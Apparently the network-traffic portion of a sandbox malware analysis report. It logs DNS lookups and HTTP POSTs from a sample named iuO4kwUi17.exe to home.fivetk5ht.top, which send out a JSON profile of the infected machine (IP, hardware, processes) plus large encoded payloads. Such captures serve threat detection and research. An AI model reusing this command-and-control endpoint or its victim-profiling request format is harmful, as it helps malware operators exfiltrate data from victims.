                                  Dec 20, 2024 17:06:08.220793962 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.220906019 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.220922947 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.220932961 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221087933 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221232891 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221245050 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221378088 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221388102 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221400023 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221509933 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221520901 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221666098 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221676111 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221829891 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221839905 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.221848965 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.222347021 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.222527027 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225508928 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225528002 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225538015 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225547075 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225693941 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225703955 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225831985 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.225989103 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226000071 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226011038 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226146936 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226164103 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226278067 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226289034 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226298094 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226309061 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226321936 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226454020 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226784945 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226794958 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226804972 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226815939 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.226825953 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.227485895 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.227660894 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.227797985 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.227807999 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228593111 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228595972 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228600979 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228884935 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228895903 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228904963 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.228918076 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229034901 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229190111 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229199886 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229347944 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229362965 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229516983 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229527950 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229670048 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229685068 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229820967 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229840040 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.229851961 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230001926 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230010986 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230171919 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230489016 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230642080 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230653048 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230663061 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.230792046 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.231859922 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.231973886 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.231992960 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.232002974 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.233019114 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.233030081 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234006882 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234016895 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234146118 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234167099 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.234285116 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.235215902 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.235225916 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.235375881 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.235513926 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236484051 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236555099 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236565113 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236574888 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.236736059 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.237108946 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.237118959 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.237234116 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.237308979 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238214016 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238224030 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238432884 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238442898 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238456964 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.238466978 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.239355087 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.239515066 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.239660978 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.239670992 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240567923 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240577936 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240587950 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240603924 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.240716934 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.241729975 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.241739988 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.241905928 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.241916895 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243040085 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243050098 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243058920 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243201971 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.243211985 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244256020 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244266033 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244275093 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244285107 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244430065 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244461060 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.244638920 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.272460938 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.272748947 CET8049706185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.480703115 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:08.600603104 CET8049708185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:08.600684881 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:08.600967884 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:08.721672058 CET8049708185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:09.874078989 CET8049708185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:09.874188900 CET8049708185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:09.874320030 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:09.874543905 CET4970880192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:09.994041920 CET8049708185.121.15.192192.168.2.10

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 20, 2024 17:05:59.259493113 CET5044853192.168.2.101.1.1.1
                                  Dec 20, 2024 17:05:59.259615898 CET5044853192.168.2.101.1.1.1
                                  Dec 20, 2024 17:05:59.396802902 CET53504481.1.1.1192.168.2.10
                                  Dec 20, 2024 17:05:59.397278070 CET53504481.1.1.1192.168.2.10
                                  Dec 20, 2024 17:06:02.752289057 CET5045153192.168.2.101.1.1.1
                                  Dec 20, 2024 17:06:02.752363920 CET5045153192.168.2.101.1.1.1
                                  Dec 20, 2024 17:06:02.891935110 CET53504511.1.1.1192.168.2.10
                                  Dec 20, 2024 17:06:03.167716980 CET53504511.1.1.1192.168.2.10
                                  Dec 20, 2024 17:06:04.755788088 CET5045353192.168.2.101.1.1.1
                                  Dec 20, 2024 17:06:04.755841970 CET5045353192.168.2.101.1.1.1
                                  Dec 20, 2024 17:06:04.897378922 CET53504531.1.1.1192.168.2.10
                                  Dec 20, 2024 17:06:04.897389889 CET53504531.1.1.1192.168.2.10
                                  Dec 20, 2024 17:06:06.580580950 CET5045553192.168.2.101.1.1.1
                                  Dec 20, 2024 17:06:06.580647945 CET5045553192.168.2.101.1.1.1
                                  Dec 20, 2024 17:06:06.718673944 CET53504551.1.1.1192.168.2.10
                                  Dec 20, 2024 17:06:06.719022989 CET53504551.1.1.1192.168.2.10
                                  Dec 20, 2024 17:06:08.341047049 CET6471453192.168.2.101.1.1.1
                                  Dec 20, 2024 17:06:08.341176033 CET6471453192.168.2.101.1.1.1
                                  Dec 20, 2024 17:06:08.479047060 CET53647141.1.1.1192.168.2.10
                                  Dec 20, 2024 17:06:08.479063988 CET53647141.1.1.1192.168.2.10

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 20, 2024 17:05:59.259493113 CET192.168.2.101.1.1.10xdf6fStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:05:59.259615898 CET192.168.2.101.1.1.10x8e84Standard query (0)httpbin.org28IN (0x0001)false
                                  Dec 20, 2024 17:06:02.752289057 CET192.168.2.101.1.1.10xfc9fStandard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:06:02.752363920 CET192.168.2.101.1.1.10x24cfStandard query (0)home.fivetk5ht.top28IN (0x0001)false
                                  Dec 20, 2024 17:06:04.755788088 CET192.168.2.101.1.1.10x2cb4Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:06:04.755841970 CET192.168.2.101.1.1.10xff1eStandard query (0)home.fivetk5ht.top28IN (0x0001)false
                                  Dec 20, 2024 17:06:06.580580950 CET192.168.2.101.1.1.10x10bbStandard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:06:06.580647945 CET192.168.2.101.1.1.10x8fa0Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                  Dec 20, 2024 17:06:08.341047049 CET192.168.2.101.1.1.10x678cStandard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:06:08.341176033 CET192.168.2.101.1.1.10x2c43Standard query (0)home.fivetk5ht.top28IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 20, 2024 17:05:59.397278070 CET1.1.1.1192.168.2.100xdf6fNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:05:59.397278070 CET1.1.1.1192.168.2.100xdf6fNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:06:02.891935110 CET1.1.1.1192.168.2.100xfc9fNo error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:06:04.897389889 CET1.1.1.1192.168.2.100x2cb4No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:06:06.718673944 CET1.1.1.1192.168.2.100x10bbNo error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                  Dec 20, 2024 17:06:08.479047060 CET1.1.1.1192.168.2.100x678cNo error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • httpbin.org
                                  • home.fivetk5ht.top

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.1049704185.121.15.192807280C:\Users\user\Desktop\iuO4kwUi17.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 17:06:03.307826996 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                  Host: home.fivetk5ht.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 443893
                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 36 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710761", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                  Dec 20, 2024 17:06:03.427750111 CET4944OUTData Raw: 45 58 56 6b 4c 61 73 6e 5c 2f 42 4a 50 34 67 32 75 44 71 48 78 45 62 54 31 49 7a 76 75 66 68 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58 36 77 36 5c 2f 69 6c 69 6f 30 38 4c
                                  Data Ascii: EXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowc
                                  Dec 20, 2024 17:06:03.427808046 CET4944OUTData Raw: 31 6d 61 48 37 6b 50 39 34 5c 2f 68 5c 2f 49 55 32 6e 76 31 5c 2f 44 2b 70 70 6c 63 58 49 5c 2f 4c 2b 76 6b 66 35 50 6e 36 36 66 73 51 65 49 37 75 66 34 4c 36 6a 6f 79 33 44 4e 61 61 66 34 76 31 66 54 37 76 54 4a 39 74 7a 70 39 37 62 54 57 75 6c
                                  Data Ascii: 1maH7kP94\/h\/IU2nv1\/D+pplcXI\/L+vkf5Pn66fsQeI7uf4L6joy3DNaaf4v1fT7vTJ9tzp97bTWul6tGt\/plyZ7G9tnm1C5UQ3Vs8DskuYmO9399174W\/DTxL5kl74WXRL6Te7al4Nul0BpJW4j87RpbbUvDKWsXU22k6Lo0suMG8QktXwb+xt4607wh4L+Mmoa0bn+yfC0Gi+K7wWyRyTJYLa6xFqlxEkskEbNbQafb
                                  Dec 20, 2024 17:06:03.427998066 CET7416OUTData Raw: 66 57 71 75 48 78 75 5c 2f 69 2b 6e 66 48 58 31 36 2b 32 65 39 53 79 64 76 39 5a 33 5c 2f 41 4b 55 32 52 58 35 54 72 7a 5c 2f 72 50 38 5c 2f 70 31 5c 2f 6e 51 64 66 4f 5c 2f 4c 2b 76 6d 56 2b 63 37 39 6e 5c 2f 62 50 48 37 6a 5c 2f 77 44 56 5c 2f
                                  Data Ascii: fWquHxu\/i+nfHX16+2e9Sydv9Z3\/AKU2RX5Trz\/rP8\/p1\/nQdfO\/L+vmV+c79n\/bPH7j\/wDV\/nOag+T5\/wDWd\/p\/n+mO2aueTn\/WEN\/L9KrSR\/e3\/f49P8\/XFBqQ+iJ\/yz\/1X+f\/ANXtxTAHb7qeYfqR+tT7X\/3Of9X\/AMt+ntnrUHlv8n8eP8j9Pp+uaDoDy0\/jSNP+WvcT9Kpsvzf7H\/TT9xb
                                  Dec 20, 2024 17:06:03.428086042 CET7416OUTData Raw: 4b 5a 5c 2f 47 6e 31 4e 53 79 64 76 78 5c 2f 70 55 64 42 32 55 2b 76 79 49 66 6d 62 31 50 38 76 38 4d 31 47 30 61 65 34 54 70 5c 2f 6e 50 2b 65 6c 57 71 6a 6b 37 66 6a 5c 2f 53 67 63 4e 76 6e 2b 69 4b 63 6b 58 39 77 65 76 62 2b 67 5c 2f 78 39 65
                                  Data Ascii: KZ\/Gn1NSydvx\/pUdB2U+vyIfmb1P8v8M1G0ae4Tp\/nP+elWqjk7fj\/SgcNvn+iKckX9wevb+g\/x9earSK6Mf4\/1\/wAn0PX1q\/J\/ufz\/AP1+voBTP4fuR\/55+n4Yz7d6Df2nl+P\/AACh8\/8Ay06d\/wCnv6UwN8r4\/wCuv+e\/TJqzJH9z\/PX+pPv0qskeI97\/AD8\/5\/8ArUHRT6\/L9SHzOv8AH+mfamK
                                  Dec 20, 2024 17:06:03.549251080 CET9888OUTData Raw: 69 35 38 47 76 68 35 71 5c 2f 69 62 34 63 36 72 38 57 66 41 33 77 77 2b 49 58 69 44 34 67 61 62 38 52 76 47 33 67 43 7a 30 69 5c 2f 31 66 52 50 45 4e 68 48 34 58 2b 46 76 6a 48 77 4a 34 54 67 38 66 4a 70 64 39 42 38 4f 72 54 34 6f 2b 50 50 68 5c
                                  Data Ascii: i58Gvh5q\/ib4c6r8WfA3ww+IXiD4gab8RvG3gCz0i\/1fRPENhH4X+FvjHwJ4Tg8fJpd9B8OrT4o+PPh\/qXjJf7M1fSLGXw34j8M63rP4fPwV+iTTr47Cy4jzF4vLsdVy3FYSnneaVcXHGUK+a4avSo4Wll08Ri1Qr5FndKtWwlOvRpSyfM1UqR+oYr2X9I0\/pA\/Tlq0MuxUeFsqjhM0wUcwweNrcOZNh8E8JUhldSlUxOM
                                  Dec 20, 2024 17:06:03.549324036 CET4944OUTData Raw: 61 52 75 5c 2f 4c 79 51 4d 78 35 4a 36 6e 76 58 38 77 59 72 36 46 5c 2f 43 71 78 4d 63 5a 6c 48 45 2b 63 35 5a 69 49 35 78 6c 57 61 4a 71 4e 50 45 4a 51 79 7a 48 35 54 6e 6c 54 44 32 78 48 74 61 56 61 57 5a 38 54 35 52 51 34 6b 7a 54 46 34 79 6a
                                  Data Ascii: aRu\/LyQMx5J6nvX8wYr6F\/CqxMcZlHE+c5ZiI5xlWaJqNPEJQyzH5TnlTD2xHtaVaWZ8T5RQ4kzTF4yjisbisznXviY4StUwsv7Uw\/7QTjevluNyniDhDIM6weOyPMMoqubrYao6+PUsCsxi8O6U6FfC8N+y4Xw8MFWwlP8AsilepGeYSePPljxT8X9D8XfDr4Ufsny+JPA3h7wJqH7MX7XnwW+JH7Svhf4Oa4nxX+APxL8d
                                  Dec 20, 2024 17:06:03.550355911 CET27192OUTData Raw: 48 5c 2f 77 43 72 72 2b 4e 4d 6b 32 4e 76 7a 35 66 5c 2f 41 45 31 5c 2f 35 62 5c 2f 36 52 5c 2f 54 2b 6e 34 30 2b 54 5a 38 37 70 77 77 6c 38 72 39 33 5c 2f 71 50 38 2b 76 50 36 30 79 52 58 48 37 37 37 6e 6c 78 65 56 46 5c 2f 7a 33 39 73 5c 2f 6c
                                  Data Ascii: H\/wCrr+NMk2Nvz5f\/AE1\/5b\/6R\/T+n40+TZ87pwwl8r93\/qP8+vP60yRXH777nlxeVF\/z39s\/l\/nFADOrbN8avJ\/y0\/z36e\/45ok+58\/\/AD18qL\/63+eOlPCvy5h+TzfXyPO\/LP8AoNQ\/7iR745fv\/wCo86D6+\/fkUGlPr8v1Bj5kbwxtI6ed+6t\/N\/x+v+NMw+3Zv2Y\/5ZyD\/Xdv+PT8Prx+U29
                                  Dec 20, 2024 17:06:03.714605093 CET23484OUTData Raw: 33 73 4c 41 69 57 31 75 37 61 4b 61 4d 5c 2f 66 51 5a 46 56 7a 4d 71 6a 53 48 6c 69 76 37 61 48 78 44 5a 33 32 6f 2b 48 72 71 38 30 7a 55 62 4f 79 31 5c 2f 54 39 4c 31 4f 39 30 54 55 72 37 51 72 36 36 74 6f 62 50 57 4c 50 54 39 5a 30 33 55 4e 49
                                  Data Ascii: 3sLAiW1u7aKaM\/fQZFVzMqjSHliv7aHxDZ32o+Hrq80zUbOy1\/T9L1O90TUr7Qr66tobPWLPT9Z03UNIvrnTZ7mG01SxvNPneO7tpoU2h+z6+iHOngqsOEpzpZjJRy+pDjzjCVPHylSlXjHBTXEzjipSo06lZKg6jdKEqivCEmepP8Abg\/tQ6VTMKNTxhpU6uUxcs1pT8F\/CGFTLYxrU8PKWYQl4cqWCiq9SFBvEKmlWqwp
                                  Dec 20, 2024 17:06:03.879125118 CET3708OUTData Raw: 58 79 50 79 5c 2f 72 35 47 38 4e 5c 2f 6c 2b 71 4b 6b 6e 54 73 48 6b 6c 50 6d 78 5c 2f 2b 33 58 2b 66 38 61 72 53 42 5c 2f 37 2b 7a 5c 2f 6e 6c 5c 2f 77 41 74 5c 2f 77 43 66 2b 66 58 32 30 76 49 65 52 74 36 50 76 68 5c 2f 35 61 79 52 6e 69 61 33
                                  Data Ascii: XyPy\/r5G8N\/l+qKknTsHklPmx\/+3X+f8arSB\/7+z\/nl\/wAt\/wCf+fX20vIeRt6Pvh\/5ayRnia3\/AOfX\/wDVUMkafc8qTef3v+e\/9P5VBr7X+9+H\/AMrcfubNj+v\/Lf6\/wD6+\/44ZIryfJv5\/wCecf8A9f8AH\/IrSkZPk+f5P+WXX9\/6f55NVvL81k\/1j\/vf+WY\/f\/8A6v60Hd7Xzl\/XzM2SHne77
                                  Dec 20, 2024 17:06:04.050539017 CET1236OUTData Raw: 61 6c 4b 4e 53 6a 4f 64 4a 52 71 55 35 4b 63 48 4b 4c 54 47 30 56 4a 6a 5c 2f 70 70 2b 76 5c 2f 41 4e 65 6f 36 39 51 38 55 4b 68 32 4e 36 66 79 5c 2f 77 41 61 6d 32 5c 2f 37 66 36 66 5c 2f 41 47 4e 46 42 74 37 5c 2f 41 50 64 5c 2f 45 68 32 4e 36
                                  Data Ascii: alKNSjOdJRqU5KcHKLTG0VJj\/pp+v\/ANeo69Q8UKh2N6fy\/wAam2\/7f6f\/AGNFBt7\/APd\/Eh2N6fy\/xptWKZsHv\/n8K0p9fl+pRFRTtjen8v8AGhl2+4rQCuer\/j\/6EKbViig6CvRS7H9vy\/8AsqSgAqvVio\/L9\/0\/+vV878v6+YEdFSeX7\/p\/9emlSvOe\/wCNHO\/L+vma868\/6+ZX2N6fy\/xp0ff8


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.1049705185.121.15.192807280C:\Users\user\Desktop\iuO4kwUi17.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 20, 2024 17:06:05.018310070 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                  Host: home.fivetk5ht.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 443893
